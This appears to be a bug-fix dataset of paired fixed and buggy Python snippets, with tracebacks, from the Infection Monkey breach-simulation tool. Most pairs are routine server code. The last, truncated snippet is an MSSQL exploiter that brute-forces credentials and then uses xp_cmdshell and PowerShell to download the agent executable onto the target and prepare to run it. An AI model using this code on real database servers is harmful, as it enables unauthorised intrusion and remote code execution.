proxies=infection_monkey.control.ControlClient.proxies,
)
self.send_response(r.status_code)
except requests.exceptions.ConnectionError as e:
LOG.error("Couldn't forward request to the island: {}".format(e))
self.send_response(404)
except Exception as e:
LOG.error("Failed to forward bootloader request: {}".format(e))
finally:
self.end_headers()
self.wfile.write(r.content)
except Exception as e:
LOG.error("Failed receiving bootloader telemetry: {}".format(e))
|
def do_POST(self):
self.send_error(501, "Unsupported method (POST)")
return
|
https://github.com/guardicore/monkey/issues/528
|
2020-01-17 10:14:45,982 - iostream.py:1518 - _do_ssl_handshake() - WARNING - SSL Error on 1504 ('1.1.1.2', 4469): [SSL: NO_SHARED_CIPHER] no shared cipher (_ssl.c:1076)
2020-01-17 10:14:46,055 - iostream.py:1518 - _do_ssl_handshake() - WARNING - SSL Error on 1500 ('1.1.1.2', 4470): [SSL: VERSION_TOO_LOW] version too low (_ssl.c:1076)
2020-01-17 10:14:46,136 - iostream.py:744 - _handle_events() - ERROR - Uncaught exception, closing connection.
Traceback (most recent call last):
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\iostream.py", line 709, in _handle_events
self._handle_read()
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\iostream.py", line 1581, in _handle_read
self._do_ssl_handshake()
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\iostream.py", line 1501, in _do_ssl_handshake
self.socket.do_handshake()
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\ssl.py", line 1139, in do_handshake
self._sslobj.do_handshake()
OSError: [Errno 0] Error
2020-01-17 10:14:46,163 - base_events.py:1604 - default_exception_handler() - ERROR - Exception in callback None()
handle: <Handle cancelled>
Traceback (most recent call last):
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\asyncio\events.py", line 88, in _run
self._context.run(self._callback, *self._args)
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\platform\asyncio.py", line 122, in _handle_events
handler_func(fileobj, events)
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\stack_context.py", line 300, in null_wrapper
return fn(*args, **kwargs)
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\iostream.py", line 709, in _handle_events
self._handle_read()
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\iostream.py", line 1581, in _handle_read
self._do_ssl_handshake()
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\iostream.py", line 1501, in _do_ssl_handshake
self.socket.do_handshake()
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\ssl.py", line 1139, in do_handshake
self._sslobj.do_handshake()
OSError: [Errno 0] Error
|
OSError
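A hedged sketch of the forwarding idea the new do_POST implements: replay the request body to the destination with requests and echo the upstream status back, falling back to 404 when the island is unreachable. The function name and return shape are illustrative.

import requests

def forward_post(url, body, proxies=None):
    try:
        r = requests.post(url=url, data=body, verify=False, proxies=proxies)
        return r.status_code, r.content
    except requests.exceptions.ConnectionError:
        # Island unreachable: report not found to the caller.
        return 404, b""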
|
def init_api_resources(api):
api.add_resource(Root, "/api")
api.add_resource(Monkey, "/api/monkey", "/api/monkey/", "/api/monkey/<string:guid>")
api.add_resource(Bootloader, "/api/bootloader/<string:os>")
api.add_resource(LocalRun, "/api/local-monkey", "/api/local-monkey/")
api.add_resource(ClientRun, "/api/client-monkey", "/api/client-monkey/")
api.add_resource(
Telemetry,
"/api/telemetry",
"/api/telemetry/",
"/api/telemetry/<string:monkey_guid>",
)
api.add_resource(MonkeyConfiguration, "/api/configuration", "/api/configuration/")
api.add_resource(
IslandConfiguration, "/api/configuration/island", "/api/configuration/island/"
)
api.add_resource(
MonkeyDownload,
"/api/monkey/download",
"/api/monkey/download/",
"/api/monkey/download/<string:path>",
)
api.add_resource(NetMap, "/api/netmap", "/api/netmap/")
api.add_resource(Edge, "/api/netmap/edge", "/api/netmap/edge/")
api.add_resource(Node, "/api/netmap/node", "/api/netmap/node/")
api.add_resource(NodeStates, "/api/netmap/nodeStates")
# report_type: zero_trust or security
api.add_resource(
Report,
"/api/report/<string:report_type>",
"/api/report/<string:report_type>/<string:report_data>",
)
api.add_resource(TelemetryFeed, "/api/telemetry-feed", "/api/telemetry-feed/")
api.add_resource(Log, "/api/log", "/api/log/")
api.add_resource(IslandLog, "/api/log/island/download", "/api/log/island/download/")
api.add_resource(PBAFileDownload, "/api/pba/download/<string:path>")
api.add_resource(
FileUpload,
"/api/fileUpload/<string:file_type>",
"/api/fileUpload/<string:file_type>?load=<string:filename>",
"/api/fileUpload/<string:file_type>?restore=<string:filename>",
)
api.add_resource(RemoteRun, "/api/remote-monkey", "/api/remote-monkey/")
api.add_resource(AttackConfiguration, "/api/attack")
api.add_resource(AttackReport, "/api/attack/report")
api.add_resource(VersionUpdate, "/api/version-update", "/api/version-update/")
api.add_resource(MonkeyTest, "/api/test/monkey")
api.add_resource(ClearCaches, "/api/test/clear_caches")
api.add_resource(LogTest, "/api/test/log")
|
def init_api_resources(api):
api.add_resource(Root, "/api")
api.add_resource(Monkey, "/api/monkey", "/api/monkey/", "/api/monkey/<string:guid>")
api.add_resource(LocalRun, "/api/local-monkey", "/api/local-monkey/")
api.add_resource(ClientRun, "/api/client-monkey", "/api/client-monkey/")
api.add_resource(
Telemetry,
"/api/telemetry",
"/api/telemetry/",
"/api/telemetry/<string:monkey_guid>",
)
api.add_resource(MonkeyConfiguration, "/api/configuration", "/api/configuration/")
api.add_resource(
IslandConfiguration, "/api/configuration/island", "/api/configuration/island/"
)
api.add_resource(
MonkeyDownload,
"/api/monkey/download",
"/api/monkey/download/",
"/api/monkey/download/<string:path>",
)
api.add_resource(NetMap, "/api/netmap", "/api/netmap/")
api.add_resource(Edge, "/api/netmap/edge", "/api/netmap/edge/")
api.add_resource(Node, "/api/netmap/node", "/api/netmap/node/")
# report_type: zero_trust or security
api.add_resource(
Report,
"/api/report/<string:report_type>",
"/api/report/<string:report_type>/<string:report_data>",
)
api.add_resource(TelemetryFeed, "/api/telemetry-feed", "/api/telemetry-feed/")
api.add_resource(Log, "/api/log", "/api/log/")
api.add_resource(IslandLog, "/api/log/island/download", "/api/log/island/download/")
api.add_resource(PBAFileDownload, "/api/pba/download/<string:path>")
api.add_resource(
FileUpload,
"/api/fileUpload/<string:file_type>",
"/api/fileUpload/<string:file_type>?load=<string:filename>",
"/api/fileUpload/<string:file_type>?restore=<string:filename>",
)
api.add_resource(RemoteRun, "/api/remote-monkey", "/api/remote-monkey/")
api.add_resource(AttackConfiguration, "/api/attack")
api.add_resource(AttackReport, "/api/attack/report")
api.add_resource(VersionUpdate, "/api/version-update", "/api/version-update/")
api.add_resource(MonkeyTest, "/api/test/monkey")
api.add_resource(ClearCaches, "/api/test/clear_caches")
api.add_resource(LogTest, "/api/test/log")
|
https://github.com/guardicore/monkey/issues/528
|
2020-01-17 10:14:45,982 - iostream.py:1518 - _do_ssl_handshake() - WARNING - SSL Error on 1504 ('1.1.1.2', 4469): [SSL: NO_SHARED_CIPHER] no shared cipher (_ssl.c:1076)
2020-01-17 10:14:46,055 - iostream.py:1518 - _do_ssl_handshake() - WARNING - SSL Error on 1500 ('1.1.1.2', 4470): [SSL: VERSION_TOO_LOW] version too low (_ssl.c:1076)
2020-01-17 10:14:46,136 - iostream.py:744 - _handle_events() - ERROR - Uncaught exception, closing connection.
Traceback (most recent call last):
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\iostream.py", line 709, in _handle_events
self._handle_read()
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\iostream.py", line 1581, in _handle_read
self._do_ssl_handshake()
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\iostream.py", line 1501, in _do_ssl_handshake
self.socket.do_handshake()
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\ssl.py", line 1139, in do_handshake
self._sslobj.do_handshake()
OSError: [Errno 0] Error
2020-01-17 10:14:46,163 - base_events.py:1604 - default_exception_handler() - ERROR - Exception in callback None()
handle: <Handle cancelled>
Traceback (most recent call last):
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\asyncio\events.py", line 88, in _run
self._context.run(self._callback, *self._args)
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\platform\asyncio.py", line 122, in _handle_events
handler_func(fileobj, events)
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\stack_context.py", line 300, in null_wrapper
return fn(*args, **kwargs)
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\iostream.py", line 709, in _handle_events
self._handle_read()
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\iostream.py", line 1581, in _handle_read
self._do_ssl_handshake()
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\iostream.py", line 1501, in _do_ssl_handshake
self.socket.do_handshake()
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\ssl.py", line 1139, in do_handshake
self._sslobj.do_handshake()
OSError: [Errno 0] Error
|
OSError
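A minimal flask-restful sketch of the registration pattern used above, showing how a Resource class binds to a templated route the way the added Bootloader endpoint does; BootloaderSketch is an illustrative stand-in.

from flask import Flask
from flask_restful import Api, Resource

app = Flask(__name__)
api = Api(app)

class BootloaderSketch(Resource):
    def post(self, os):
        # The real resource parses bootloader telemetry; this just echoes.
        return {"os": os}, 200

api.add_resource(BootloaderSketch, "/api/bootloader/<string:os>")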
|
def main():
logger.info("Starting bootloader server")
mongo_url = os.environ.get("MONGO_URL", env.get_mongo_url())
bootloader_server_thread = Thread(
target=BootloaderHttpServer(mongo_url).serve_forever, daemon=True
)
bootloader_server_thread.start()
start_island_server()
bootloader_server_thread.join()
|
def main():
from tornado.wsgi import WSGIContainer
from tornado.httpserver import HTTPServer
from tornado.ioloop import IOLoop
mongo_url = os.environ.get("MONGO_URL", env.get_mongo_url())
wait_for_mongo_db_server(mongo_url)
assert_mongo_db_version(mongo_url)
populate_exporter_list()
app = init_app(mongo_url)
crt_path = os.path.join(MONKEY_ISLAND_ABS_PATH, "cc", "server.crt")
key_path = os.path.join(MONKEY_ISLAND_ABS_PATH, "cc", "server.key")
if env.is_debug():
app.run(host="0.0.0.0", debug=True, ssl_context=(crt_path, key_path))
else:
http_server = HTTPServer(
WSGIContainer(app),
ssl_options={
"certfile": os.environ.get("SERVER_CRT", crt_path),
"keyfile": os.environ.get("SERVER_KEY", key_path),
},
)
http_server.listen(env.get_island_port())
log_init_info()
IOLoop.instance().start()
|
https://github.com/guardicore/monkey/issues/528
|
2020-01-17 10:14:45,982 - iostream.py:1518 - _do_ssl_handshake() - WARNING - SSL Error on 1504 ('1.1.1.2', 4469): [SSL: NO_SHARED_CIPHER] no shared cipher (_ssl.c:1076)
2020-01-17 10:14:46,055 - iostream.py:1518 - _do_ssl_handshake() - WARNING - SSL Error on 1500 ('1.1.1.2', 4470): [SSL: VERSION_TOO_LOW] version too low (_ssl.c:1076)
2020-01-17 10:14:46,136 - iostream.py:744 - _handle_events() - ERROR - Uncaught exception, closing connection.
Traceback (most recent call last):
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\iostream.py", line 709, in _handle_events
self._handle_read()
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\iostream.py", line 1581, in _handle_read
self._do_ssl_handshake()
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\iostream.py", line 1501, in _do_ssl_handshake
self.socket.do_handshake()
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\ssl.py", line 1139, in do_handshake
self._sslobj.do_handshake()
OSError: [Errno 0] Error
2020-01-17 10:14:46,163 - base_events.py:1604 - default_exception_handler() - ERROR - Exception in callback None()
handle: <Handle cancelled>
Traceback (most recent call last):
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\asyncio\events.py", line 88, in _run
self._context.run(self._callback, *self._args)
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\platform\asyncio.py", line 122, in _handle_events
handler_func(fileobj, events)
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\stack_context.py", line 300, in null_wrapper
return fn(*args, **kwargs)
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\iostream.py", line 709, in _handle_events
self._handle_read()
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\iostream.py", line 1581, in _handle_read
self._do_ssl_handshake()
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\iostream.py", line 1501, in _do_ssl_handshake
self.socket.do_handshake()
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\ssl.py", line 1139, in do_handshake
self._sslobj.do_handshake()
OSError: [Errno 0] Error
|
OSError
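A self-contained sketch of the startup shape, assuming only the standard library: the bootloader server blocks on a daemon thread so the main thread stays free for the island server, mirroring the Thread(..., daemon=True) wiring above.

from http.server import BaseHTTPRequestHandler, HTTPServer
from threading import Thread

server = HTTPServer(("127.0.0.1", 0), BaseHTTPRequestHandler)  # port 0: any free port
bootloader_thread = Thread(target=server.serve_forever, daemon=True)
bootloader_thread.start()
# ... the blocking island server would start here; on shutdown:
server.shutdown()
bootloader_thread.join()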
|
def get_edge_label(edge):
node_service = monkey_island.cc.services.node.NodeService
from_id = edge["from"]
to_id = edge["to"]
try:
from_label = Monkey.get_label_by_id(from_id)
except MonkeyNotFoundError:
from_label = node_service.get_node_by_id(from_id)["domain_name"]
if to_id == ObjectId("000000000000000000000000"):
to_label = "MonkeyIsland"
else:
if Monkey.is_monkey(to_id):
to_label = Monkey.get_label_by_id(to_id)
else:
to_label = node_service.get_node_label(node_service.get_node_by_id(to_id))
return "%s %s %s" % (from_label, RIGHT_ARROW, to_label)
|
def get_edge_label(edge):
node_service = monkey_island.cc.services.node.NodeService
from_id = edge["from"]
to_id = edge["to"]
from_label = Monkey.get_label_by_id(from_id)
if to_id == ObjectId("000000000000000000000000"):
to_label = "MonkeyIsland"
else:
if Monkey.is_monkey(to_id):
to_label = Monkey.get_label_by_id(to_id)
else:
to_label = node_service.get_node_label(node_service.get_node_by_id(to_id))
return "%s %s %s" % (from_label, RIGHT_ARROW, to_label)
|
https://github.com/guardicore/monkey/issues/528
|
2020-01-17 10:14:45,982 - iostream.py:1518 - _do_ssl_handshake() - WARNING - SSL Error on 1504 ('1.1.1.2', 4469): [SSL: NO_SHARED_CIPHER] no shared cipher (_ssl.c:1076)
2020-01-17 10:14:46,055 - iostream.py:1518 - _do_ssl_handshake() - WARNING - SSL Error on 1500 ('1.1.1.2', 4470): [SSL: VERSION_TOO_LOW] version too low (_ssl.c:1076)
2020-01-17 10:14:46,136 - iostream.py:744 - _handle_events() - ERROR - Uncaught exception, closing connection.
Traceback (most recent call last):
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\iostream.py", line 709, in _handle_events
self._handle_read()
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\iostream.py", line 1581, in _handle_read
self._do_ssl_handshake()
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\iostream.py", line 1501, in _do_ssl_handshake
self.socket.do_handshake()
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\ssl.py", line 1139, in do_handshake
self._sslobj.do_handshake()
OSError: [Errno 0] Error
2020-01-17 10:14:46,163 - base_events.py:1604 - default_exception_handler() - ERROR - Exception in callback None()
handle: <Handle cancelled>
Traceback (most recent call last):
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\asyncio\events.py", line 88, in _run
self._context.run(self._callback, *self._args)
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\platform\asyncio.py", line 122, in _handle_events
handler_func(fileobj, events)
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\stack_context.py", line 300, in null_wrapper
return fn(*args, **kwargs)
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\iostream.py", line 709, in _handle_events
self._handle_read()
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\iostream.py", line 1581, in _handle_read
self._do_ssl_handshake()
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\iostream.py", line 1501, in _do_ssl_handshake
self.socket.do_handshake()
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\ssl.py", line 1139, in do_handshake
self._sslobj.do_handshake()
OSError: [Errno 0] Error
|
OSError
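The fallback shape of the fix, reduced to a sketch with injected lookups (the parameter names are illustrative): try the monkey label first and fall back to the node's domain name when the edge source was never registered as a monkey.

def resolve_from_label(from_id, get_monkey_label, get_node, not_found_exc):
    try:
        return get_monkey_label(from_id)
    except not_found_exc:
        # Not a monkey: label the edge source by its domain name instead.
        return get_node(from_id)["domain_name"]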
|
def get_monkey_group(monkey):
keywords = []
if len(set(monkey["ip_addresses"]).intersection(local_ip_addresses())) != 0:
keywords.extend(["island", "monkey"])
else:
monkey_type = (
"manual" if NodeService.get_monkey_manual_run(monkey) else "monkey"
)
keywords.append(monkey_type)
keywords.append(NodeService.get_monkey_os(monkey))
if not Monkey.get_single_monkey_by_id(monkey["_id"]).is_dead():
keywords.append("running")
return NodeStates.get_by_keywords(keywords).value
|
def get_monkey_group(monkey):
if len(set(monkey["ip_addresses"]).intersection(local_ip_addresses())) != 0:
monkey_type = "island_monkey"
else:
monkey_type = (
"manual" if NodeService.get_monkey_manual_run(monkey) else "monkey"
)
monkey_os = NodeService.get_monkey_os(monkey)
monkey_running = (
"" if Monkey.get_single_monkey_by_id(monkey["_id"]).is_dead() else "_running"
)
return "%s_%s%s" % (monkey_type, monkey_os, monkey_running)
|
https://github.com/guardicore/monkey/issues/528
|
2020-01-17 10:14:45,982 - iostream.py:1518 - _do_ssl_handshake() - WARNING - SSL Error on 1504 ('1.1.1.2', 4469): [SSL: NO_SHARED_CIPHER] no shared cipher (_ssl.c:1076)
2020-01-17 10:14:46,055 - iostream.py:1518 - _do_ssl_handshake() - WARNING - SSL Error on 1500 ('1.1.1.2', 4470): [SSL: VERSION_TOO_LOW] version too low (_ssl.c:1076)
2020-01-17 10:14:46,136 - iostream.py:744 - _handle_events() - ERROR - Uncaught exception, closing connection.
Traceback (most recent call last):
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\iostream.py", line 709, in _handle_events
self._handle_read()
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\iostream.py", line 1581, in _handle_read
self._do_ssl_handshake()
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\iostream.py", line 1501, in _do_ssl_handshake
self.socket.do_handshake()
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\ssl.py", line 1139, in do_handshake
self._sslobj.do_handshake()
OSError: [Errno 0] Error
2020-01-17 10:14:46,163 - base_events.py:1604 - default_exception_handler() - ERROR - Exception in callback None()
handle: <Handle cancelled>
Traceback (most recent call last):
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\asyncio\events.py", line 88, in _run
self._context.run(self._callback, *self._args)
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\platform\asyncio.py", line 122, in _handle_events
handler_func(fileobj, events)
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\stack_context.py", line 300, in null_wrapper
return fn(*args, **kwargs)
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\iostream.py", line 709, in _handle_events
self._handle_read()
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\iostream.py", line 1581, in _handle_read
self._do_ssl_handshake()
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\iostream.py", line 1501, in _do_ssl_handshake
self.socket.do_handshake()
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\ssl.py", line 1139, in do_handshake
self._sslobj.do_handshake()
OSError: [Errno 0] Error
|
OSError
|
def get_node_group(node) -> str:
if "group" in node and node["group"]:
return node["group"]
node_type = "exploited" if node.get("exploited") else "clean"
node_os = NodeService.get_node_os(node)
return NodeStates.get_by_keywords([node_type, node_os]).value
|
def get_node_group(node):
node_type = "exploited" if node.get("exploited") else "clean"
node_os = NodeService.get_node_os(node)
return "%s_%s" % (node_type, node_os)
|
https://github.com/guardicore/monkey/issues/528
|
2020-01-17 10:14:45,982 - iostream.py:1518 - _do_ssl_handshake() - WARNING - SSL Error on 1504 ('1.1.1.2', 4469): [SSL: NO_SHARED_CIPHER] no shared cipher (_ssl.c:1076)
2020-01-17 10:14:46,055 - iostream.py:1518 - _do_ssl_handshake() - WARNING - SSL Error on 1500 ('1.1.1.2', 4470): [SSL: VERSION_TOO_LOW] version too low (_ssl.c:1076)
2020-01-17 10:14:46,136 - iostream.py:744 - _handle_events() - ERROR - Uncaught exception, closing connection.
Traceback (most recent call last):
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\iostream.py", line 709, in _handle_events
self._handle_read()
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\iostream.py", line 1581, in _handle_read
self._do_ssl_handshake()
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\iostream.py", line 1501, in _do_ssl_handshake
self.socket.do_handshake()
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\ssl.py", line 1139, in do_handshake
self._sslobj.do_handshake()
OSError: [Errno 0] Error
2020-01-17 10:14:46,163 - base_events.py:1604 - default_exception_handler() - ERROR - Exception in callback None()
handle: <Handle cancelled>
Traceback (most recent call last):
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\asyncio\events.py", line 88, in _run
self._context.run(self._callback, *self._args)
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\platform\asyncio.py", line 122, in _handle_events
handler_func(fileobj, events)
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\stack_context.py", line 300, in null_wrapper
return fn(*args, **kwargs)
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\iostream.py", line 709, in _handle_events
self._handle_read()
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\iostream.py", line 1581, in _handle_read
self._do_ssl_handshake()
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\site-packages\tornado\iostream.py", line 1501, in _do_ssl_handshake
self.socket.do_handshake()
File "C:\Users\Vakaris\AppData\Local\Programs\Python\Python37\lib\ssl.py", line 1139, in do_handshake
self._sslobj.do_handshake()
OSError: [Errno 0] Error
|
OSError
|
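Note on the fix above: it honors an explicit "group" field on the node before computing one, and it swaps the old "%s_%s" string concatenation for a lookup on a NodeStates enum. NodeStates and NodeService are Monkey Island internals; the sketch below illustrates the keyword-lookup idea with a hypothetical, minimal NodeStates (the node dict shape is also an assumption).

from enum import Enum

class NodeStates(Enum):
    # Hypothetical stand-in for the real Monkey Island NodeStates enum.
    CLEAN_LINUX = "clean_linux"
    CLEAN_WINDOWS = "clean_windows"
    EXPLOITED_LINUX = "exploited_linux"
    EXPLOITED_WINDOWS = "exploited_windows"

    @staticmethod
    def get_by_keywords(keywords):
        # Return the state whose name contains every keyword,
        # e.g. ["exploited", "linux"] -> NodeStates.EXPLOITED_LINUX.
        for state in NodeStates:
            parts = state.value.split("_")
            if all(kw in parts for kw in keywords):
                return state
        raise ValueError("No state matches keywords: %r" % (keywords,))

node = {"exploited": True, "os": "linux"}  # illustrative node document
node_type = "exploited" if node.get("exploited") else "clean"
print(NodeStates.get_by_keywords([node_type, node["os"]]).value)  # exploited_linux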
def process_system_info_telemetry(telemetry_json):
telemetry_processing_stages = [
process_ssh_info,
process_credential_info,
process_mimikatz_and_wmi_info,
process_aws_data,
update_db_with_new_hostname,
test_antivirus_existence,
]
    # Calling safe_process_telemetry so if one of the stages fails, we log and move on instead of failing the rest of
# them, as they are independent.
for stage in telemetry_processing_stages:
safe_process_telemetry(stage, telemetry_json)
|
def process_system_info_telemetry(telemetry_json):
process_ssh_info(telemetry_json)
process_credential_info(telemetry_json)
process_mimikatz_and_wmi_info(telemetry_json)
process_aws_data(telemetry_json)
update_db_with_new_hostname(telemetry_json)
test_antivirus_existence(telemetry_json)
|
https://github.com/guardicore/monkey/issues/460
|
2019-10-11 19:36:09,431 - processing.py:29 - process_telemetry() - ERROR - Exception caught while processing telemetry. Info: _id
Traceback (most recent call last):
File "C:\Users\shay.nehmad\PycharmProjects\monkey\monkey\monkey_island\cc\services\telemetry\processing\processing.py", line 25, in process_telemetry
TELEMETRY_CATEGORY_TO_PROCESSING_FUNC[telem_category](telemetry_json)
File "C:\Users\shay.nehmad\PycharmProjects\monkey\monkey\monkey_island\cc\services\telemetry\processing\system_info.py", line 16, in process_system_info_telemetry
update_db_with_new_hostname(telemetry_json)
File "C:\Users\shay.nehmad\PycharmProjects\monkey\monkey\monkey_island\cc\services\telemetry\processing\system_info.py", line 105, in update_db_with_new_hostname
Monkey.get_single_monkey_by_id(telemetry_json['_id']).set_hostname(telemetry_json['data']['hostname'])
KeyError: '_id'
|
KeyError
|
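The fix above wraps each independent stage so that one failing stage (such as the KeyError on '_id' in the traceback) no longer aborts the stages after it. safe_process_telemetry is defined elsewhere in the Island code; a minimal sketch of what such a guard typically looks like, assuming a module-level logger:

import logging

logger = logging.getLogger(__name__)

def safe_process_telemetry(processing_function, telemetry_json):
    # Run one independent processing stage; log failures instead of letting
    # them propagate and abort the remaining stages.
    try:
        processing_function(telemetry_json)
    except Exception:
        logger.exception(
            "Error while processing telemetry stage %s", processing_function.__name__
        )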
def update_db_with_new_hostname(telemetry_json):
Monkey.get_single_monkey_by_guid(telemetry_json["monkey_guid"]).set_hostname(
telemetry_json["data"]["hostname"]
)
|
def update_db_with_new_hostname(telemetry_json):
Monkey.get_single_monkey_by_id(telemetry_json["_id"]).set_hostname(
telemetry_json["data"]["hostname"]
)
|
https://github.com/guardicore/monkey/issues/460
|
2019-10-11 19:36:09,431 - processing.py:29 - process_telemetry() - ERROR - Exception caught while processing telemetry. Info: _id
Traceback (most recent call last):
File "C:\Users\shay.nehmad\PycharmProjects\monkey\monkey\monkey_island\cc\services\telemetry\processing\processing.py", line 25, in process_telemetry
TELEMETRY_CATEGORY_TO_PROCESSING_FUNC[telem_category](telemetry_json)
File "C:\Users\shay.nehmad\PycharmProjects\monkey\monkey\monkey_island\cc\services\telemetry\processing\system_info.py", line 16, in process_system_info_telemetry
update_db_with_new_hostname(telemetry_json)
File "C:\Users\shay.nehmad\PycharmProjects\monkey\monkey\monkey_island\cc\services\telemetry\processing\system_info.py", line 105, in update_db_with_new_hostname
Monkey.get_single_monkey_by_id(telemetry_json['_id']).set_hostname(telemetry_json['data']['hostname'])
KeyError: '_id'
|
KeyError
|
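The KeyError arises because system-info telemetry carries no "_id" field; the agent identifies itself by "monkey_guid", so the fix keys the lookup on that field instead. A sketch of the payload shape under that assumption (fields other than "monkey_guid", "data" and "hostname" are illustrative):

# Hypothetical system-info telemetry document.
telemetry_json = {
    "monkey_guid": "1234567890",
    "telem_category": "system_info",
    "data": {"hostname": "victim-host"},
}

print(telemetry_json.get("_id"))      # None: the field the old code indexed is absent
print(telemetry_json["monkey_guid"])  # '1234567890': the key the fixed code uses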
def exploit_host(self):
# Brute force to get connection
username_passwords_pairs_list = self._config.get_exploit_user_password_pairs()
cursor = self.brute_force(
self.host.ip_addr, self.SQL_DEFAULT_TCP_PORT, username_passwords_pairs_list
)
if not cursor:
LOG.error("Bruteforce process failed on host: {0}".format(self.host.ip_addr))
return False
        # Get monkey exe for host and its path
src_path = tools.get_target_monkey(self.host)
if not src_path:
LOG.info("Can't find suitable monkey executable for host %r", self.host)
return False
        # Create server for http download and wait for its startup.
http_path, http_thread = HTTPTools.create_locked_transfer(self.host, src_path)
if not http_path:
LOG.debug("Exploiter failed, http transfer creation failed.")
return False
LOG.info("Started http server on %s", http_path)
dst_path = get_monkey_dest_path(http_path)
tmp_file_path = os.path.join(get_monkey_dir_path(), MSSQLExploiter.TMP_FILE_NAME)
# Create monkey dir.
commands = ['xp_cmdshell "mkdir %s"' % get_monkey_dir_path()]
MSSQLExploiter.execute_command(cursor, commands)
# Form download command in a file
commands = [
'xp_cmdshell "<nul set /p=powershell (new-object System.Net.WebClient).DownloadFile>%s"'
% tmp_file_path,
"xp_cmdshell \"<nul set /p=(^'%s^' >>%s\"" % (http_path, tmp_file_path),
"xp_cmdshell \"<nul set /p=, ^'%s^') >>%s\"" % (dst_path, tmp_file_path),
]
MSSQLExploiter.execute_command(cursor, commands)
MSSQLExploiter.run_file(cursor, tmp_file_path)
# Form monkey's command in a file
monkey_args = tools.build_monkey_commandline(
self.host, tools.get_monkey_depth() - 1, dst_path
)
monkey_args = [
'xp_cmdshell "<nul set /p=%s >>%s"' % (part, tmp_file_path)
for part in textwrap.wrap(monkey_args, 40)
]
commands = [
